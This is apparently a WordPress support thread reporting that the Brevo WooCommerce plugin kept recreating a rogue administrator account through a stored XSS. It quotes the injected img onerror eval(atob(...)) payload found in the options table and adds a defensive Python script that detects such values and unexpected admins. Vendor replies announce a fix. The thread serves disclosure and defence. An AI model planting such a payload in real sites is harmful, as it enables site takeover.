• Annonnimmo

    (@annonnimmo)


    Over the years, I have found a lot of problems (and also degraded website performance) using this plugin.

    Now the worst: I noticed accidentally that every time I visit the Brevo plugin page on my WP backend, a new illicit admin user is created: woocommerce_bot@gmail.com

    Updating to the latest version, 4.0.50, doesn’t solve the problem; this user keeps getting recreated.

    I luckily found a solution from another user (god bless him!), but I’m sorry that I cannot put the link here.

    Shame on Brevo coders and directors!

Viewing 4 replies - 1 through 4 (of 4 total)
  • Thread Starter Annonnimmo

    (@annonnimmo)

    The link to the solution, to definitively remove the rogue admin user created by Brevo plugin: https://www.reddit.com/r/Wordpress/comments/1qpwn4w/brevo_for_woocommerce_plugin_stored_xss_led_to/

    Thread Starter Annonnimmo

    (@annonnimmo)

    In the database, “options” table, “sendinblue_woocommerce_user_connection_id” option_name, I found this malicious code:

    x"><img src=x onerror="eval(atob('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'))"><a href="

    Be careful!
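    A triage check for the symptoms described in this post, as an added example that is not from the thread or from the plugin: it classifies the stored option value, decodes any eval(atob(...)) payload so an analyst can read it, and lists administrator accounts that are not on the site owner's allowlist. The option value and user rows below are constructed samples, and the base64 is a harmless placeholder, not the payload found in the wild.

```python
import base64
import re

# Constructed sample in the shape of the wp_options value the reporter describes.
# The base64 content is a harmless placeholder, NOT the real payload.
SAMPLE_OPTION_VALUE = (
    'x"><img src=x onerror="eval(atob(\''
    + base64.b64encode(b'console.log("constructed placeholder")').decode()
    + '\'))"><a href="'
)

# Assumption: a legitimate connection id is an opaque token (letters, digits,
# dash, underscore); anything with markup or quotes is out of place.
LEGIT_ID = re.compile(r"^[A-Za-z0-9_\-]{1,128}$")
ATOB_EVAL = re.compile(r"atob\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
MARKERS = ("<img", "onerror", "eval(", "atob(", "<script")


def inspect_connection_id(value):
    """Classify the option value; decode an eval(atob(...)) payload if present."""
    if LEGIT_ID.fullmatch(value):
        return {"suspicious": False, "reason": "opaque token", "decoded": None}
    found = [m for m in MARKERS if m in value.lower()]
    decoded = None
    match = ATOB_EVAL.search(value)
    if match:
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            decoded = "<undecodable base64>"
    return {
        "suspicious": bool(found) or "<" in value,
        "reason": "html/js markers: " + ",".join(found),
        "decoded": decoded,
    }


# Constructed user rows, shaped like `wp user list --fields=ID,user_login,user_email,roles`.
SAMPLE_USERS = [
    {"ID": 1, "user_login": "owner", "user_email": "owner@example.com", "roles": "administrator"},
    {"ID": 57, "user_login": "woocommerce_bot", "user_email": "woocommerce_bot@gmail.com", "roles": "administrator"},
    {"ID": 12, "user_login": "editor1", "user_email": "editor1@example.com", "roles": "editor"},
]


def unexpected_admins(users, known_admin_logins):
    """Return administrator accounts whose login is not on the owner's allowlist."""
    return [u for u in users
            if "administrator" in u["roles"] and u["user_login"] not in known_admin_logins]


if __name__ == "__main__":
    print(inspect_connection_id(SAMPLE_OPTION_VALUE))
    print(unexpected_admins(SAMPLE_USERS, {"owner"}))
```

    Run the same two checks against a real site by feeding in the output of `wp option get sendinblue_woocommerce_user_connection_id` and `wp user list --role=administrator`; any admin you did not create should be investigated, not just deleted, because the stored option would recreate it.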

    Christelle

    (@christellem)

    Hello @annonnimmo,

    We’re very sorry for the inconvenience this situation has caused and completely understand your frustration.

    To help us investigate this issue as quickly and thoroughly as possible, could you please open a ticket through your Brevo account > Support & Tickets?

    In parallel, we are already contacting our technical team so they can start looking into this matter right away.

    Thank you in advance for your cooperation, and please rest assured that we are doing our best to resolve this for you as soon as possible.

    Kind regards,

    Christelle

    (@christellem)

    Hello @annonnimmo,

    We would like to inform you that the plugin has been updated to version 4.0.51, which includes a fix addressing the security issue identified in the previous version.

    We sincerely apologize for any inconvenience this may have caused and recommend updating to this latest version as soon as possible to ensure the security and proper functioning of your installation.

    Please feel free to reach out if you need any assistance with the update — we’ll be happy to help.

    Kind regards,
